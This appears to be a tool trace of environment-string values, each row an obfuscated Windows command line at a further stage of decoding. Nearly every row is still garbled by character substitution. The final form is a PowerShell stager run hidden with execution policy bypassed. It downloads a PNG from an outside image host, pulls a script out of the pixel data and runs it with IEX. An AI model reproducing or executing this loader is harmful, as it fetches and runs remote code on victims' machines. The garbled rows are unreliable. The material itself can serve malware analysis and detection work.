f6aRIA3k9le:e*Xt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y%	1	Fn
Environment	Get Environment String	name = ~\, result_out = set suL]f6aK. 1 @sheZVelLId{DnOy+@sTzEhELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'OpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7OyaK1{matTzEhOy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTzEhA]Oy#H).ReplaCE11{CTzEhA]Oy98+{CTzEhA]Oy8#+{CTzEhA]OyDn06),{sTRInaEOy{CTzEhA]OyDn2H).ReplaCE11{CTzEhA]OyDnDn8+{CTzEhA]Oy5H+{CTzEhA]Oy8Dn),{sTRInaEOy{CTzEhA]Oy#6))^&^& seT aDI/`aKEcTzEhO 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyO4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolO -4Zqf6N TzEhIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OzEhIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y%	1	Fn
Environment	Get Environment String	name = \,, result_out = set suL]f6aK. 1 @sheZVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'OpenRead19a'+'7'+'TFttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTF1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDI/`aKEcTFO 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyO4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolO -4Zqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y%	1	Fn
Environment	Get Environment String	name = `[+, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps:cgcgimag'+'es2.img3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDI/`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E cgc %adi/Y%	1	Fn
Environment	Get Environment String	name = .#, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps:cgcgimag'+'es2.img3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:eXt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E cgc %adizY%	1	Fn
Environment	Get Environment String	name = @;?#, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^\|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY%	1	Fn
Environment	Get Environment String	name = ,@$[, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7S`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11LS eqf6NV:s3L]V).f6aL3e ) ^^^\|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyASS -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY%	1	Fn
Environment	Get Environment String	name = {$_, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7S`stem.D]a'+'4'+'ing9a7['+'f66pBMds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'f66pBM'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'f6'+'6'+'pBM7 in10..H'+'2('+'))\f66pBM'+'t'+'taKf66pBMds.aEe'+'ttyi7el1f66pBM7,'+'f6'+'6pBM_'+')[f66pBMmk'+'{f66pBM'+'_H28+f66pBM7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBMtt.B-3k9andDn5)Dn6)-3k9o]'+'1f66pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1f66'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComManD.Iqf6NVOkesCRityT11LS eqf6NV:s3L]V).f6aL3e ) ^^^\|tyO4ERsheiVElL -noqf6Niqf6NTE]aCTI -qf6NolO -4iqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyASS -nOty]OFIle -COmMAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY%	1	Fn
Environment	Get Environment String	name = '`#, result_out = set suL]vaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9a7S`stem.D]a'+'4'+'ing9a7['+'v6pBMds'+'aKf] S`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'v6pBM'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\fo]eacTF1'+'v'+'6'+'pBM7 in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyi7el1v6pBM7,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_H28+v6pBM7OyaK1{matTFOy::F'+'lo'+'o]11v6'+'pBMtt.B-3k9andDn5)Dn6)-3k9o]'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'t]ing1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3L]V).vaL3e ) ^^^\|tyO4ERsheiVElL -noqvNiqvNTE]aCTI -qvNolO -4iqvN TFIdden -e7ecuTIOqvNpOLIc 3k9`tyASS -nOty]OFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY%	1	Fn
Environment	Get Environment String	name = }\?, result_out = set suLrvaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9a7S`stem.Dra'+'4'+'ing9a7['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps://imag'+'es2.img3k9o'+'7.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9a7'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBM7 in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyi7el1v6pBM7,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_H28+v6pBM7OyaK1{matTFOy::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFArOy#H).ReplaCE11{CTFArOy98+{CTFArOy8#+{CTFArOyDn06),{sTRInaEOy{CTFArOyDn2H).ReplaCE11{CTFArOyDnDn8+{CTFArOy5H+{CTFArOy8Dn),{sTRInaEOy{CTFArOy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -e7ecuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.e7E /c %adizY%	1	Fn
Environment	Get Environment String	name = {;, result_out = set suLrvaK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBMx in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyixel1v6pBMx,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_H28+v6pBMxOyaK1{matTFOy::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+'Oy::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9ax',{sTRInaEOy{CTFArOy#H).ReplaCE11{CTFArOy98+{CTFArOy8#+{CTFArOyDn06),{sTRInaEOy{CTFArOyDn2H).ReplaCE11{CTFArOyDnDn8+{CTFArOy5H+{CTFArOy8Dn),{sTRInaEOy{CTFArOy#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25Oy-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = `}$@, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6pBMds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6pBM'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'pBMx in10..H'+'2('+'))\v6pBM'+'t'+'taKv6pBMds.aEe'+'ttyixel1v6pBMx,'+'v'+'6pBM_'+')[v6pBMmk'+'{v6pBM'+'_H28+v6pBMx]aK1{matTF]::F'+'lo'+'or11v6'+'pBMtt.B-3k9andDn5)Dn6)-3k9or'+'1v6pBMt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'pBM'+'mk{0.'+'.'+'Dn'+'90('+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = ?$_, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'2('+'))\v6Q'+'t'+'taKv6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_H28+v6Qx]aK1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'90('+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = ;.+, result_out = set suLrvaK. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'aKfr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mkaKfr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'taKv6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_H28+v6Qx]aK1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`aKEcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
